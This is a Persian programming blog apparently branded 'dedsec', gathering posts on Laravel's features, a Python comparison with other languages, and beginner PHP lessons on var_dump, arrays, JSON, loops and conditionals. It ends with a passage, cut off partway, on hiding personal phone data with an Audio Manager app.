داشتن ORM قدرتمند: شاید مهم ترین بخش هر فریم‌ورکی بخش ORM آن است. لاراول با استفاده از ORM‌ای به نام Eloquent بازدهی بسیار بالایی داشته است. ORM موجود در لاراول به راحتی برای پایگاه‌های داده PostgresSQL و MySQL و SQL Server و SQLite سازگار است. البته کتابخانه‌هایی برای کار با دیتابیس‌های دیگر از جمله Oracle و MongoDB نیز دارد. یکی از مزیت‌های استفاده از ORM قدرتمندی مانند Eloquent این است که در هر مرحله از توسعه نرم افزار که احساس کردید باید سیستم پایگاه داده سایت خود را عوض کنید به راحتی با انجام تنظیمات اندک به یک سیستم پایگاه داده دیگر کوچ می‌کنید. این کار در برنامه نویسی‌های Flat و بدون Framework کاری بسیار پیچیده و نیازمند مدت‌ها کار و اصلاحات فراوان در برنامه است.

تمپلیت انجین حرفه ای: لاراول از سیستم Template Engine اختصاصی Blade استفاده می‌کند. Template Engine‌ها کار طراحی صفحات HTML را برای نرم افزار شما ساده تر کرده و اصول امنیتی را به صورت پیشفرض رعایت می‌کنند. البته امکان تغییر سیستم Template Engine پیشفرض لاراول با دیگر سیستم‌ها وجود دارد که با کمی جستجو در اینترنت می‌توانید کتابخانه‌های مناسب را بیابید.

استفاده از Composer: استفاده از Composer‌ها چند سالی است در فریم‌ورک‌ها بیشتر شده است. در واقع Composer‌ها راهکاری عالی و منسجم برای بروز رسانی نرم افزارها هستند. با Composer تنها با ویرایش یک فایل ساده قادر خواهید بود آپدیت شدن تمام پکیج‌های خود را به سادگی مدیریت کنید. البته Composer برای نصب و پیاده سازی کتابخانه‌ها نیز مورد استفاده قرار می‌گیرد و به عنوان مثال برای نصب Laravel مجبورید نرم افزار Composer را روی سیستم خود نصب و با استفاده از Composer پکیج‌های لاراول را روی سیستم خود پیاده سازی کنید. از Composer‌ها نترسید چون با کمی آزمون خطا به Composer عادت می‌کنید.

ساده سازی فرایند‌های تایید هویت: فرایند تایید هویت فرایندی پیچیده است. پیاده سازی سازوکار‌های ثبت نام کاربر، تایید عضویت، ورود و خروج کاربر نیازمند تجربه و دانش در این زمینه است که لاراول با تمهیداتی که سنجیده است این بخش را بسیار ساده و ایمن کرده است.

ویژگی‌های امنیتی در لاراول: یکی از وظایف هر فریم‌ورکی کمک در توسعه نرم افزارهای ایمن است. لاراول نیز از این قاعده مستثنی نیست و دائما در حال افزایش تمهیدات امنیتی در فریم‌ورک خود است. اگر از لاراول استفاده می‌کنید تا حد زیادی از XSS ها، SQL Injection‌ها و هر نوع آسیب پذیری مرتبط با نرم افزار خود آسوده خاطر باشید. در آخرین بروز رسانی‌های لاراول حتی تعداد درخواست‌های یک Router در دقیقه نیز توسط برنامه نویس قابل تنظیم هستند.

تلفظ درست Laravel

هر چند ما در این پست و دیگر پست‌های سایت از تلفظ لاراول استفاده می‌کنیم ولی در واقع تلفظ صحیح این واژه لَرَوِل است.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

یادگیری سریع کدهای لاراول با برگه های تقلب

کدهای تقلب در فریم‌ورک‌های برنامه نویسی راهکاری مناسب برای یادگیری سریع و آسان کدها هستند.

مخصوصا اگر با ساختار یک فریم‌ورک آشنا هستید و می‌خواهید کار با یک فریم‌ورک جدید را یاد بگیرید می‌توانید از کدهای تقلب استفاده کنید.

در این آدرس یک cheat sheet یا برگه تقلب برای کدهای لاراول می‌بینید.

یادگیری لاراول

اگر می‌خواهید از درست بودن کد خود مطمئن شوید، و یا این که می‌خواین خیلی سریع ببینید مثلا کوکی چطور ذخیره می‌شه از این برگه‌های تقلب استفاده کنید.

این صفحه کامل شامل کدهای مرتبط با کنسول artisan و ابزار Tinker و کدهای Controller و حتی Blade و Form‌ها می‌باشد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

مقایسه Python با هشت زبان برنامه نویسی

Python را اغلب با دیگر زبان‌های تفسیر شده مانند جاوا، جاوا اسکریپت، پرل، Tcl یا SmalTalk مقایسه می‌کنند. البته مقایسه با C++ و Common Lisp و یا Schame نیز می‌تواند کارآمد باشد. در این مطلب قصد داریم Python را با زبان‌های نامبرده مقایسه کنیم.

تمرکز این مقایسات فقط بر مسائل مربوط به زبان است، هر چند انتخاب زبان برنامه‌نویسی، اغلب بستگی به محدودیت‌های دنیای واقعی مانند هزینه، موجود بودن، آموزش‌ها، سرمایه‌ یا حتی علاقه‌ی شخصی افراد دارد.

مقایسه Python با جاوا

زبان برنامه نویسی جاوا

برنامه‌های Python عموماً نسبت به برنامه‌های جاوا کندتر اجرا می‌شوند، ولی اغلب برای توسعه‌ زمان کمتری نیاز دارند. برنامه‌های Python، معمولاً سه تا پنج برابر کوتاه‌تر از برنامه‌های معادل‌شان در برنامه‌های جاوا هستند. این تفاوت می‌تواند بخاطر انواع داده‌ای سطح بالای تعبیه شده‌ی داخلی یا typing داینامیکِ Python باشد.
برای مثال، یک برنامه‌نویسِ Python برای اعلان انواع آرگومان‌ها یا متغیر‌ها وقت تلف نمی‌کند و لیست چند ریختی قدرتمندِ Python و انواعِ dictionary، جهت پشتیبانی دستوری قدرتمند، مستقیماً در زبان تعبیه شده‌اند و همیشه در برنامه‌هایِ Python استفاده می‌شوند.

بخاطرِ typing زمان اجرا، run time مربوط به python نسبت به جاوا باید سخت‌تر کار کند. برای مثال زمان ارزیابی عبارتِ a+b، ابتدا run time باید شیء‌هایِ a و b را بررسی کند تا نوع‌شان را پیدا کند، این عملیات در زمان کامپایل انجام نمی‌شوند. سپس عملیات متناسب با جمع، فراخوانی می‌شود که ممکن است یک متد overload شده توسط کاربر باشد. از طرف دیگر، جاوا، می‌تواند یک integer کارآمد یا یک نقطه اعشار اضافه را اجرا کند ولی نیاز به اعلان متغیرهایِ a و b دارد و اجازه overload کردن عملگرِ + را برای کلاس‌های تعریف شده توسط کاربر، نمی‌دهد.

به دلایل مذکور، Python بعنوان یک زبانِ "glue" بهتر عمل می‌کند درحالی که جاوا بیش‌تر بعنوان یک زبان پیاده‌سازی سطح پایین شناخته می‌شود. در واقع، ترکیب این دو زبان با هم فوق‌العاده است. کامپوننت‌ها می‌توانند در جاوا توسعه یافته و طراحی شوند و در Python با فرم‌های برنامه ترکیب شوند؛ همچنین تا زمانی‌که طراحی کامپوننت‌ها با پیاده‌سازیِ جاوا herdened” شود، می‌توان از Python بعنوان نمونه‌ی اولیه استفاده کرد. برای پشتیبانی از چنین روشِ توسعه‌ای، یک پیاده‌سازی از Python که در حال نوشته شدن با جاوا است، در حال توسعه است و از طریق جاوا و vice versa امکان فراخوانی کدِ Pyhton را فراهم می‌آورد. در این پیاده‌سازی، سورس‌کدِ Python به بایت‌کدِ جاوا ترجمه می‌شود (به کمک کتابخانه‌ی run-time برای پشتیبانی از سمانتیکِ داینامیکِ Python).

مقایسه Python با جاوا اسکریپت

زیرمجموعه‌ی "مبتنی بر شیءِ" Python، تقریباً معادل با جاوا اسکریپت است. Python هم مثل جاوا اسکریپت (نه جاوا)، از استایلی از برنامه نویسی پشتیبانی می‌کند که از توابع و متغیرهای ساده استفاده می‌کند، بدون این‌که درگیر تعریفِ کلاس‌ها شود. به هرحال، این تمام چیزی است که در مورد جاوا اسکریپت وجود دارد. از طرف دیگر، Python از کدنویسی برنامه‌های خیلی بزرگ پشتیبانی می‌کند و از طریق استایل برنامه‌نویسیِ شیء‌گرا، که کلاس‌ها و وراثت نقش مهمی در آن بازی می‌کنند، بخوبی قابلیتِ استفاده‌ی مجدد از کد را فراهم می‌کند.

مقایسه Python و پِرل (Perl)

زبان برنامه نویسی Perl

Python و پِرل، پیش‌زمینه‌ی مشابهی دارند (اسکریپت‌نویسیِ یونیکس، که هر دو رشد خوبی در این زمینه داشته‌اند)، و از بسیاری از قابلیت‌های مشابه پشتیبانی می‌کنند ولی فلسفه‌ی آن‌ها با هم فرق می‌کند. پرل، بر پشتیبانی از اعمال مبتنی بر شیءِ پرکاربرد تأکید دارد، مثلِ داشتن عبارت‌های منظمِ تعبیه شده، پویش فایل و قابلیت‌های تولید گزارش. Python بر پشتیبانی از روش‌های برنامه‌نویسی پرکاربرد تأکید دارد، مثلِ طراحی ساختار داده و برنامه‌نویسی شیء‌گرا، و با ارائه‌ی یک نشانه‌گذاری زیبا و نه بیش‌از حد مرموز، برنامه‌نویس‌ها را به نوشتن کد‌های خوانا (و البته با قابلیت نگهداری) تشویق می‌کند. در نتیجه، Python مشابه پرل است ولی کمتر در دامنه‌ی برنامه‌ی اصلی استفاده می‌شود؛ به هر حال Python نسبت به پرل، کاربرد بیش‌تری دارد.

مقایسه Python و Tcl

Tcl هم مثلِ Python بعنوان یک زبان توسعه‌ی برنامه، بخوبی یک زبان برنامه‌نویسی مستقل کاربرد دارد. به هر حال، Tcl، که بطور معمول تمام داده‌ها را بعنوان رشته ذخیره می‌کند، از نظر ساختارهای داده‌ای ضعیف است و کدهای معمولی را کندتر از Python اجرا می‌کند. Tcl، قابلیت‌های مورد نیاز برای نوشتن برنامه‌های بزرگ مثل namespaceهای ماژولار را ندارد. بنابراین، معمولاً وقتی یک برنامه‌ی بزرگِ از Tcl استفاده می‌کند، extentionهایی دارد که با C یا C++ نوشته شده‌اند و مخصوص آن برنامه هستند.

اغلب یک برنامه‌ی معادلِ نوشته شده با Python، می‌تواند بصورتِ "pure Python" هم نوشته شود. البته، توسعه‌ی pure Python سریع‌تر از نوشتن و اشکال‌زداییِ یک کامپوننتِ C یا C++ است. گفته می‌شود که جبران کیفیت، معادل با ابزارِ TK است. Python، بعنوانِ کتابخانه‌ی کامپوننت رابط کاربری گرافیکی استاندارد، یک رابط (interface) به TK دارد.

Tcl 8.0 با ارائه‌ی کامپایلرِ بایت‌کد که در پشتیبانی از نوع داده‌ها و اضافه کردن namespaceها محدودیت دارد، مسائلِ پرسرعت را آدرس‌دهی می‌کند. به هر حال، این زبان، هنوز هم یک زبان برنامه‌نویسی دست و پا گیر است.

مقایسه Python با small talk

شاید بزرگ‌ترین تفاوت میان python و smalltalk، این باشد که دستوراتِ Python، بیش‌تر "mailstream" هستد و این امر باعث می‌شود که در زمینه‌ی آموزش برنامه‌نویسی یک سطح بالاتر باشد. Python هم مثلِ Smalltalk دارای typing و اتصال (binding) داینامیک و شی گرایی است. به هر حال، Python انواع شیء‌های تعبیه شده‌ی داخلی را از کلاس‌های تعریف شده توسط کاربر متمایز کرده و در حال حاضر اجازه‌ی ارث بری از انواع تعبیه شده‌ی داخلی را نمی‌دهد. کتابخانه‌ی استانداردِ کالکشنِ انواع داده‌ایِ Smalltalk بیش‌تر اصلاح شده، در حالی‌که کتابخانه‌ی Python برای تعامل با اینترنت و حقایقِ WWW مثل ایمیل، HTML و FTP امکانات بیش‌تری دارد.

Python در مورد محیط توسعه و توزیع کد، فلسفه‌ی متفاوتی دارد. در حالی‌که Smalltalk، تصویرِ یکپارچه‌ای از سیستم دارد که شامل هر دو محیط کاربری و برنامه‌ی کاربر می‌شود، Python هر دو ماژول‌های استاندارد و ماژول‌های کاربر را در فایل‌های منحصر به فردی که در خارج از سیستم به سادگی قابل مرتب شدن و توزیع شدن هستند، ذخیره می‌کند. نتیجه این‌که برای متصل کردن یک رابط گرافیکی (GUI) به برنامه‌ی Python، بیش‌تر از یک آپشن مورد نیاز است، در حالی‌که GUI داخل سیستم تعبیه نشده است.

مقایسه Python و C++

زبان برنامه نویسی C++

تقریباً هر چیزی که در مورد جاوا وجود دارد، در C++ هم قابل اعمال است. درحالی‌که کدِ Python، سه تا پنج برابر کوتاه‌تر از کد جاوای معادل آن است، اغلب پنج تا ده برابر کوتاه‌تر از کد معادل آن در C++ است! شواهد نشان می‌دهند که یک برنامه‌نویسِ Python می‌تواند کاری را در دو ماه تمام کند در حالی‌که دو برنامه‌نویس جاوا نمی‌توانند در یک سال هم همان کار را تمام کنند. Python در جایگاه یک زبانِ "glue" می‌درخشد و برای ترکیب کامپوننت‌های نوشته شده در C++ استفاده می‌شود.

مقایسه Python و Common Lisp و Scheme

این زبان‌ها از لحاظِ معنا‌گراییِ داینامیک، شبیه به Python هستند، ولی از لحاظ رویکردشان نسبت به دستورات، متفاوت هستند که باعث می‌شود که مقایسه تقریبا تبدیل به یک آرگومانِ تعصبی شود: حذفِ دستورات از Lips یک مزیت است یا یک عیب؟ باید توجه داشت که قابلیت‌های درونیِ Python شبیه به Lips هستند و برنامه‌های Python می‌توانند قطعه برنامه‌ها را بسرعت ساخته و اجرا کنند. معمولاً خواص دنیای واقعی تعیین شده هستند: Common Lips بزرگ (مزیت خیلی خوبی است) است و دنیایِ Scheme بین تعداد زیادی از ورژن‌های ناسازگار تقسیم شده، در حالی‌که Python یک پیاده‌سازیِ واحد، مجانی و فشرده دارد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش کامل استفاده از تابع var_dump در php

تابع var_dump() یک تابع کاربردی برای نمایش ساختار اطلاعات است. مثال زیر را ببینید:

var_dump(2);

خروجی دستور فوق int 2 است. که بیان گر این است که ورودی این تابع یک عدد integer بوده است.

مثال زیر:

var_dump("2")

خروجی تابع فوق عبارت string '2' (length=1) که بیان گر رشته بودن ورودی تابع با طول یک است.

شاید مهم ترین کابرد تابع var_dump() استفاده به منظور بررسی آرایه هاست. مثال زیر را با هم ببینیم:

var_dump(array('1', '2'));

خروجی تابع فوق به شکل زیر است:

array (size=2)
  0 => string '1' (length=1)
  1 => string '2' (length=1)

البته می‌توان چند آرایه را نیز به تابع var_dump داد. مانند زیر:

var_dump(array('1', '2'), array('a', 'b'));

که خروجی تابع فوق به صورت زیر است:

array (size=2)
  0 => string '1' (length=1)
  1 => string '2' (length=1)
array (size=2)
  0 => string 'a' (length=1)
  1 => string 'b' (length=1)

مقایسه var_dump و print_r

همانطور که می‌دانید، تابع print_r نیز مانند var_dump برای چاپ آرایه‌ها کاربرد دارد. باید گفت print_r تنها کلید و مقدار را نمایش می‌دهد ولی var_dump اطلاعات بیشتری شامل نوع و طول را نیز نمایش می‌دهد. در نمایش object‌ها نیز var_dump اطلاعات بیشتری را به نمایش در می‌آورد. در زیر مثالی از نمایش object با هر دو تابع print_r و var_dump می‌بینیم:

$obj = (object) array('BMW', 'BENZ', 'KIA');
var_dump($obj);
print_r($obj);

خروجی به شکل زیر است:

object(stdClass)[1]
  string 'BMW' (length=3)
  string 'BENZ' (length=4)
  string 'KIA' (length=3)

stdClass Object ( [0] => BMW [1] => BENZ [2] => KIA )

مشکل نمایش نا مناسب تابع var_dump

معمولا خروجی تابع var_dump همانطور که در تصویر زیر می‌بینید رنگ بندی شده و مرتب است:

نمایش var_dump

ولی گاهی نتیجه اجرای همین آرایه بالا به شکل نامناسب زیر نمایش داده می‌شود:

نمایش نا مناسب var_dump

دلیل این مشکل فعال نبودن وصله XDebug در تنظیمات php.ini است. برای حل این مشکل نقطه ویرگول را از اول عبارت زیر حذف کرده و Apache خود را مجددا راه اندازی کنید:

zend_extension = "C:\xampp\php\ext\php_xdebug.dll"

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

دوره آموزش PHP قسمت هفتم

در این قسمت با آرایه ها و حلقه ها در زبان برنامه نویسی PHP آشنا می‌شوید.

آشنایی با آرایه‌ها در PHP

آرایه‌ها در تمام زبان‌های برنامه نویسی وجود دارند و نقش مهمی در برنامه‌ها ایفا می‌کنند.

آرایه‌ها برای سازماندهی داده‌ها به صورت منظم و مرتب کاربرد دارند و به دو نوع آرایه یک بعدی و چند بعدی تشکیل می‌شوند.

آرایه‌ها در واقع همان ماتریس‌ها هستند که در این قسمت قصد داریم روش پیاده سازی ماتریس‌ها یا همان آرایه‌ها را به شما آموزش بدهیم.

در قسمت پنجم چند نوع داده را با هم معرفی کردیم، برای تعریف آرایه‌ها باید نوع داده آرایه را استفاده کنید. سورس زیر را ببینید:

$array_variable= array('one', 'two', 'three', 'foure', 'five');

در بالا یک مثال از آرایه یک بعدی با پنج آیتم می‌بینید. برای چاپ آرایه فوق از دستور var_dump($array_variable) استفاده کنید.

توجه کنید که هر عنصر از آرایه از صفر به بالا شماره گذاری یا به اصطلاح اندیس گذاری می‌شود. برای فراخوانی یک آیتم از اندیس آن آیتم داخل آکولاد استفاده می‌کنیم.

echo $array_variable[0];

توجه کنید که کل آرایه را نمی‌توان با دستور echo چاپ کرد، و فقط می‌توان عناصر خاصی از یک آرایه را با echo نمایش داد. نتیجه اجرای کد فوق عبارت one خواهد بود.

برای تغییر یک آیتم نیز مانند زیر عمل می‌کنیم:

$array_variable[0]= 'six';

اگر آرایه را با دستور var_dump($array_variable) چاپ کنید خواهید دید عنصر اول از one به six تغییر پیدا کرده است.

برای اضافه کردن عنصر جدید به آرایه می‌توانید یک اندیس جدید را مقدار دهی کنید. مثلا آرایه فوق از 0 تا 4 اندیس گذاری شده اند بنابراین داریم:

<?php
$array_variable= array('one', 'two', 'three', 'foure', 'five');
$array_variable[5]= 'six';
var_dump($array_variable);
?>

آرایه‌های چند بعدی در PHP

کل مثال‌های ذکر شده در بالا متعلق به آرایه‌های تک بعدی بودند. ولی همان طور که در اول این آموزش نیز گفتیم، آرایه‌ها می‌توانند چند بعدی باشند. آرایه‌های چند بعدی در واقع آرایه‌ای از آرایه‌ها هستند. مانند:

<?php
$array_variable= array(array('apple', 'banana'), array('green', 'blue'));
var_dump($array_variable);
?>

نتیجه اجرای کد بالا مانند زیر خواهد بود:

array (size=2)
  0 => 
    array (size=2)
      0 => string 'apple' (length=5)
      1 => string 'banana' (length=6)
  1 => 
    array (size=2)
      0 => string 'green' (length=5)
      1 => string 'blue' (length=4)

در سطر اول مشخص می‌شود که این آرایه size‌ای برابر دو دارد و دو بعدی است. در سطر دوم آرایه صفرم شروع شده و آیتم‌ها ذکر می‌شوند. در سطر ششم آرایه یکم شروع می‌شود.

برای چاپ رنگ green این گونه اندیس آرایه را وارد می‌کنیم:

echo $array_variable[1][0];

در بالا در آکولاد اول شماره آرایه و در شماره دوم شماره آیتم را وارد می‌کنیم.

در مثال پایین قصد داریم یک آرایه جدید به آرایه دو بعدی اضافه کنیم:

<?php
$array_variable= array(array('apple', 'banana'), array('green', 'blue'));
$array_variable[2]= array('pen', 'pencil');
var_dump($array_variable); die();
?>

در این جا نیز آرایه‌ها به ترتیب از صفر شماره گذاری می‌شوند. چون در ابتدا تنها دو آرایه داشتیم پس برای اضافه کردن آرایه جدید از اندیس 2 استفاده می‌کنیم.

نتیجه اجرای کد فوق را در زیر خواهید دید:

array (size=3)
  0 => 
    array (size=2)
      0 => string 'apple' (length=5)
      1 => string 'banana' (length=6)
  1 => 
    array (size=2)
      0 => string 'green' (length=5)
      1 => string 'blue' (length=4)
  2 => 
    array (size=2)
      0 => string 'pen' (length=3)
      1 => string 'pencil' (length=6)

Json و آرایه ها

آرایه‌هایی که در بالا ایجاد کردیم فقط حین اجرای برنامه تولید می‌شوند و نمی‌توان آن‌ها را ذخیره و بعدها دوباره مورد استفاده قرار داد. یکی از روش‌های ذخیره آرایه‌ها تبدیل آن‌ها به ساختار Json است.

مثال زیر را با هم بررسی می‌کنیم:

<?php
$array_variable= array(array('apple', 'banana'), array('green', 'blue'));
echo json_encode($array_variable);
?>

خروجی کدهای بالا به شکل زیر است:

[["apple","banana"],["green","blue"]]

همانطور که می‌بینید آرایه دو بعدی ما تبدیل به یک رشته متنی مانند فوق شده است.

حال مثال زیر را ببینید:

<?php
$json= '[["apple","banana"],["green","blue"]]';
$array_variable= json_decode($json);
var_dump($array_variable);
?>

اگر در مرورگر نتایج فوق را اجرا کنید خواهید دید به سادگی رشته Json تبدیل به یک آرایه می‌شود.

Json کجا کاربرد دارد؟

Json بسیار جدی است و در تمام زبان‌های برنامه نویسی پیشرفته کاربرد دارد. فرض کنید سیستمی را با php پیاده سازی کرده اید و می‌خواهید یک سری اطلاعات را با سیستمی دیگر که به زبان Java نوشته شده است رد و بدل کنید. شاید بهترین راه کار رد و بدل کردن اطلاعات در قالب Json است.

تمام زبان‌های برنامه نویسی آرایه‌ها را به یک فرم به Json تبدیل می‌کنند بنابراین در هر جایی می‌توان از Json استفاده کرد.

آرایه با اندیس دلخواه

در مثال‌های فوق دیدیم اندیس آرایه‌ها از صفر شروع شده و یکی یکی اندیس‌ها بالا می‌روند. می‌توان اندیس‌ها را با روش زیر به صورت دلخواه تعیین کرد:

$array_variable= array('one' => 'apple', 'two' => 'banana', 'three' => 'orange', 'four' => 'mango', 'five' => 'blueberry');

حال برای دسترسی به apple به شکل زیر عمل می‌کنیم:

$array_variable= array('one' => 'apple', 'two' => 'banana', 'three' => 'orange', 'four' => 'mango', 'five' => 'blueberry');
echo $array_variable['one'];

خروجی کد فوق apple است.

حلقه‌ها در برنامه نویسی PHP

حلقه‌ها زمانی کاربرد پیدا می‌کنند که بخواهید عمل معینی را تکرار کنید. تعداد تکرار‌ها می‌توانند مشخص و به تعداد خاص و یا بر اساس یک شرط مشخص باشند. انواع حلقه‌ها در PHP به شرح زیر هستند:

حلقه For: برای تکرار به تعداد معین.
حلقه while: تکرار تا زمانی که شرط معینی بر قرار باشد.
حلقه do while: تکرار تا زمانی که شرط معینی بر قرار باشد.
حلقه foreach: تکرار به میزان عناصر داده شده به حلقه.

حلقه For: همانطور که گفته شد این حلقه برای تکرار به تعداد معین کاربرد دارد. مثلا فرض کنید می‌خواهیم با استفاده از for از یک تا 10 را چاپ کنیم:

<?php
for ($i=1; $i < 11; $i++) { 
    echo $i."<br>";
}
?>

در سطر دوم کد بالا حلقه for با استفاده از متغیر $i از یک تا ده در خروجی چاپ می‌شود. همانطور که می‌بینید حلقه for سه ورودی دارد. ورودی اول $i=1 نشان دهنده گام اول حلقه است. ورودی $i < 11 نشان دهنده اجرای حلقه تا زمان برقراری این شرط، و $i++ نشان دهنده گام‌های پیشرفت متغیر $i است.

نکته: دستور $i++ به معنای اضافه کردن یک واحد به متغیر $i و دستور $i-- به معنای کاهش یک واحد از متغیر $i است.

حلقه while: حلقه while درون حلقه کروشه را تا زمانی که شرط معینی برقرار باشد اجرا می‌کند:

<?php
$i=1;
while($i < 11){
    echo $i.'<br>';
    $i++;
}
?>

در سطر دوم متغیر $i را مقدار دهی کردیم، در سطر سوم در پرانتز مقابل while یک شرط قرار دادیم و با این شرط دستورات درون حلقه while تا وقتی که $i کوچکتر از 11 باشد اجرا می‌شود.

در خط چهارم شماره چاپ شده و با <br> به سطر دوم می‌رویم. خط پنجم نیز متغیر $i را یک واحد افزایش می‌دهد.

حلقه do while: ساختاری مشابه while تنها دارد با این تفاوت که شرط حلقه در انتها چک می‌شود:

<?php
$i=1;
do{
    echo $i.'<br>';
    $i++;
}while($i < 11);
?>

در خط دوم متغیر $i را مقدار دهی کردیم. در خط سوم اجرای دستورات اجرا می‌شود. خط چهارم مقدار متغیر $i را چاپ کرده و با <br> به سطر بعدی می‌رود. خط پنجم متغیر $i را یک واحد بیشتر کرده و در سطر ششم شرط $i کوچکتر از 11 را بررسی می‌کند.

حلقه foreach: این حلقه پرکاربرد ترین نوع حلقه هاست و تمام اعضای یک آرایه را چاپ می‌کند. در زیر یک آرایه به foreach داده و سعی می‌کنیم مقادیر موجود در آن را چاپ کنیم:

<?php
$array_items= array('one', 'two', 'three', 'four', 'five');
foreach ($array_items as $value) {
    echo $value."<br>";
}
?>

در سطر دو یک آرایه با نام $array_items ایجاد و مقدار دهی کردیم. در سطر سوم با استفاده از foreach قصد داریم تمام آیتم‌های این آرایه را چاپ کنیم. درون پرانتز ابتدا نام متغیر آرایه را گذاشته و پس از as یک متغیر کلیدی برای چاپ هر آیتم تعریف می‌کنیم که در این جا از value استفاده کردیم.

در خط چهارم با استفاده از متغیر کلیدی تعریف شده در سطر سوم شروع به چاپ آیتم‌ها کرده و با <br> به سطر بعدی می‌رویم.

البته از foreach می‌توان برای چاپ اندیس‌ها نیز استفاده کرد. مثال زیر را ببینید:

<?php
$array_items= array('one' => 'apple', 'two' => 'banana', 'three' => 'orange', 'four' => 'mango', 'five' => 'blueberry');
foreach ($array_items as $key => $value) {
   echo $key.": ".$value."<br>";
}
?>

در سطر دوم یک آرایه با اندیس دلخواه تعریف کردیم.

در سطر سوم ساختار foreach به شکلی که می‌بینید ویرایش شد. در خط چهارم نیز اندیس‌ها با استفاده از $key و مقادیر با $value چاپ می‌شود. خروجی به شکل زیر است:

one: apple
two: banana
three: orange
four: mango
five: blueberry

امیدوارم این قسمت را به خوبی تمرین کرده و اگر سوالی داشتید در بخش نظرات با ما در میان بگذارید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

دوره آموزش PHP قسمت ششم

در این قسمت قصد داریم دستورات شرطی PHP را به شما آموزش دهیم. تقریبا هیچ برنامه‌ای وجود ندارد که در آن شرطی وجود نداشته باشد.

دستورات شرطی اجرای یک سری از دستورات را مشروط به یک شرط معین می‌کنند. مثلا کد زیر را ببینید:

if(5 > 2){
     echo "شرط موجود در پرانتز صحیح است";
}

در بالا با استفاده از تابع if یک شرط را بررسی کردیم. شرط 5 > 2 بررسی می‌کند که آیا 5 از 2 بزرگتر است یا خیر. اگر این مقایسه صحیح بود کدهای موجود درون کروشه متعلق به if اجرا می‌شوند. اگر کد بالا را اجرا کنید نوشته "شرط موجود در پرانتز صحیح است" نمایش داده می‌شود. مثال زیر را تست کنید:

if(5 < 2){
     echo "شرط موجود در پرانتز صحیح است";
}

اگر کد بالا را تست کنید خواهید دید در خروجی هیچ چیزی چاپ نمی‌شود.

حالا دستور if را کمی حرفه‌ای تر کنیم:

if(5 < 2){
     echo "شرط موجود در پرانتز صحیح است";
}else{
     echo "شرط موجود در پرانتز صحیح نیست";
}

دستور if فوق دو بخشی است. بخش اول که همان if است شرط درون پرانتز را چک می‌کند، اگر صحیح بود آن را اجرا می‌کند ولی اگر غلط بود به سراغ else می‌رود و آن را اجرا می‌کند. بنابراین وقتی کد بالا را تست کنید خواهید دید متن "شرط موجود در پرانتز صحیح نیست" چاپ خواهد شد.

حالا دستور if را باز کمی حرفه‌ای تر می‌کنیم:

if(5 < 2){
     echo "شرط موجود در پرانتز اول صحیح است";
}elseif(8 < 2){
     echo "شرط موجود در پرانتز دوم صحیح است";
}

دستور فوق ابتدا if را تست می‌کند، چون برقرار نبوده سراغ elseif می‌رود و شرط آن را بررسی می‌کند، اگر شرط دوم برقرار بود دستورات درون آن را اجرا می‌کند. البته در بالا بدلیل اشتباه بودن هر دو شرط هیچ چیزی در خروجی نمایش داده نمی‌شود.

مثال: به نظرتان دستور زیر چه خروجی‌ای دارد؟

<?php
$number= 9;
if($number < 2){
    echo "عدد داده شده کوچکتر از 2 است";
}elseif($number < 5){
    echo "عدد داده شده کوچکتر از 5 است";
}else{
    echo "عدد داده شده بزرگتر از 5 است";
}
?>

اگر کد فوق را در سیستم خود تست کنید خواهد دید عبارت "عدد داده شده بزرگتر از 5 است" چاپ خواهد شد. در خط 3 شرط درون پرانتز برقرار نیست، چون عدد بزرگتر از 2 است. در خط 6 نیز شرط برقرار نیست، و خط هشت بدلیل برقرار نبودن شروط فوق اجرا خواهد شد.

تابع switch case در PHP

این تابع به منظور بررسی شروط با تعداد بالا می‌باشد. در زیر مثالی می‌زنیم که بررسی کنیم متغیر $number برابر چه عددی است:

<?php
$number= 9;
switch ($number) {
    case 1:
        echo 1;
        break;
    case 2:
        echo 2;
        break;
    case 3:
        echo 3;
        break;
    case 4:
        echo 4;
        break;
    case 5:
        echo 5;
        break;
    case 6:
        echo 6;
        break;
    case 7:
        echo 7;
        break;
    case 8:
        echo 8;
        break;
    case 9:
        echo 9;
        break;
    default:
        echo "عدد وارده یا بزرگتر از 9 است یا کوچکتر از 1";
        break;
}
?>

اگر سوالی دارید در بخش نظرات با ما در میان بگذارید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

مخفی کردن اطلاعات گوشی

توی این آموزش میخوام نحوه ی مخفی کردن تمام اطلاعات گوشی

از جمله برنامه ها و تصاویر و موسیقی ها و غیره. رو آوموزش بدم که نحوه ی دسترسی به اونها فقط به عقل جن یا شایدم کسایی که این ترفند رو بلد باشن برسه :)

توی این پست ما از نرم افزار Audio Manager استفاده میکنیم که لینک دانلودش رو آخر پست قرار میدم

این نرم افزار همونطور که از اسمش مشخصه برای مدیریت صدای گوشی هستش که مثلا میتونیم صدای زنگ گوشی رو بالا ببرم و غیره.

اما توی این نرم افزار گزینه ای قرار داره که وقتی اونو لمس کنیم و چند لحظه نگه داریم وارد یه جای مخفی میشه که به ما کمک میکنه تا بتونیم تمام اطلاعاتمون رو مخفی کنیم

اول از همه نرم افزار رو دانلود و نصب کنید که البته پیشنهاد میکنم از سایتای دیگه دانلود کنید

چون این وب مربوط به هک و امنیت هستش و قبلا آموزش ساخت نرم افزار کنترل گوشی از راه دور رو داده بودیم که الان ممکنه بعدا اگه اتفاقی براتون بیفته فکر کنین کار ما بوده و یکسری مشکلات دیگه پیش بیاد

اما اگه اعتماد کافی رو دارین میتونین برنامه رو از پایین پست دانلود و نصب کنین

بعد از نصب طبق تصاویری که قرار میدم پیش برین

اولین صفحه ای که بعد از اجرا با اون روبرو میشید صفحه ی پایین هستش

متن بالا به این معنی هستش که شما باید لوگویی که بهش اشاره شده رو لمس کنین و چند لحظه نگه دارین

و این پیغام برای دفعات بعدی نشون داده نمیشه.

بعد از اینکه نگه داشتین با تصویر پایین روبرو میشید که خواهم گفت چی چی هستش

توی تصویر بالا همونطور که مشخصه باید انتخاب کنیم که موقع وارد شدن چه نوع کیبوردی رو میخوایم

